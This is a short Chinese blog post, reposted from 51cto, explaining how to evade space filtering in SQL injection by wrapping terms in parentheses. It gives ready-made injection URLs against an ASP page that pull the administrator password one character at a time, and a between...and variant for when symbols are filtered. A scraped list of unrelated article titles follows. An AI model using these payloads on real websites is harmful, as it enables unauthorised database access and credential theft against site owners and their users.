关于空格,有许多替换方式,比如TAB空格,SQL数据库中的/**/,但我又找到了另一种替换方式,已发表于《***手册》2006.7期中,这里挑其精华,现一下吧!

对于SQL语句,大家还都习惯于其的空格,比如select id from [name],如果中间没有了空格,那就成了selectidfrom[name], 一滩糊涂!除了上面所说到几个空格的替代方法外,我发现用()括号在SQL中一样可以运行,比如上面的语句,就可以写成,select(id)from[name],有括号分隔,可以正常执行。
     举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其实可以写成这样的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了符号,则用between…and…,语句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?

呵呵,总结一下,和LOVESHELL上的朋友分享一下。

转载于:https://blog.51cto.com/liuq5212/41403

******:突破空格的限制相关推荐

  1. php写邮件空格_PHP 邮件漏洞小结

    前言 此篇文件为有关PHP邮件漏洞的总结,如有错误,还请各位师傅指出. PHP mail()函数介绍 PHP mail()函数利用姿势 PHP中,mail的函数在底层是写好的,调用linux的send ...

  2. xss攻击突破转义_WEB安全之XSS攻击方式与防御方式

    上一期给大家简单介绍XSS以及其操作,本期将带大家了解XSS比较常见的攻击方式与防御方式,一起去了解一下~ XSS 常见攻击方法 1.绕过 XSS-Filter,利用 <> 标签注入 Ht ...

  3. 如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)...

    0x01 问题提出 还记得上篇文章记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门),我们讲到了一些PHP的一些如何巧妙地绕过数字和字母受限的技巧,今天我要给大家分享的是如 ...

  4. for循环语句例题及解析python_Python入门第8课,for语句综合练习,突破循环累加难点...

    6月2日大陈上了Python入门第7课,从学生上交的练习题来看,第2题和第5题错误最多. 第2题:阅读程序写结果 for i in range(6): print("*") 有一部 ...

  5. asp 检查黑名单_黑名单验证的突破

    黑名单验证的突破 操作系统特性 windows下对大小写不敏感,php和Php对windows来说都是一样的. windows下,上传的文件名中带有test.php::$DATA会在服务器生产一个te ...

  6. sql2005性能优化(在32位系统上突破2G内存使用量的方法)

    服务器磁盘为(SAS)IBM组成RAID0+1,SQL2K5只识别4G内存,实际只占用2G内存.而使用 AWE的话,应用程序可以直接将操作系统允许的最大物理内存量保留为未分页的内存.使用 AWE 使  ...

  7. 阿里云大咖秀——了不起的“空格”

    在这个脑洞大开的APP上面,你可以出售任何你想出售的"商品",包括你的时间.你的技能,你可以陪人聊天.代人跑腿,甚至只是笑给你听.这款特别的APP上线仅仅60天就获得了1个亿的A轮 ...

  8. Ubuntu20.04安装NVIDIA显卡驱动、CUDA、CUDNN及突破NVENC并发限制

    1.查看当前系统版本 cat /proc/version 显示为: 2.查看当前显卡型号: sudo lshw -numeric  -C display 显示我的显卡型号为:GM107M[GeForc ...

  9. 【C语言】BC102 带空格直角三角形图案(DAY 9)

    文章目录 原题题目 代码实现 重点突破 同类题通解 原题题目 题目传送门 代码实现 #include<stdio.h> int main() {int n=0;while (scanf(& ...

最新文章

  1. 梦想成现实:用xUnit.net在单元测试中实现构造函数依赖注入
  2. PKUWC 2018游记
  3. C语言中将绝对地址转换为函数指针以及跳转到内存指定位置处执行的技巧
  4. 2.监控软件zabbix-客户端安装
  5. Service OS maintain ( Reference Object )
  6. 循环所有数据库执行脚本
  7. 关于c++的一些案例
  8. XenApp_XenDesktop_7.6实战篇之十二:组策略配置
  9. 怎样快速提高新站权重收录
  10. CentOS 修改默认语言
  11. mstsc 中文打不了_伟大的中文!(妙不可言)
  12. 关于visio的使用
  13. 华为云计算培训技术如何革新传统行业
  14. python解析can报文_解析.DBC文件, 读懂CAN通信矩阵,实现车内信号仿真
  15. box-shadow详解
  16. UGUI源码剖析(CanvasUpdateSystem 画布刷新系统)
  17. Unity3D 如何干净的解除父子关系
  18. 万恶的ie8 hack问题
  19. Edgar--java中的delete小老弟的故事
  20. uni-app 使用 iconfont

热门文章

  1. c语言根据变量作用域不同分为,C语言中不同变量的访问方式
  2. xgboost通俗_【通俗易懂】XGBoost从入门到实战,非常详细
  3. 导入项目报错报错Error:java: Cannot run program “D:/jdk/jdk1.7.0_67/bin/java“
  4. 安卓学习笔记02:测试安卓开发环境
  5. Java Web学习笔记02:在Intellij里创建Web项目
  6. 【tyvj3303】连接格点,区分多维与单维很关键
  7. 应用程序_构建应用程序12 条参考准则
  8. 计算机怎样辅助与美工结合,环保教案:幼儿园环保美工与信息技术整合案例
  9. 宇视摄像头ip搜索软件下载_搜索资源?下载资源?一款软件就给你安排的妥妥的...
  10. 【英语学习】【WOTD】encroach 释义/词源/示例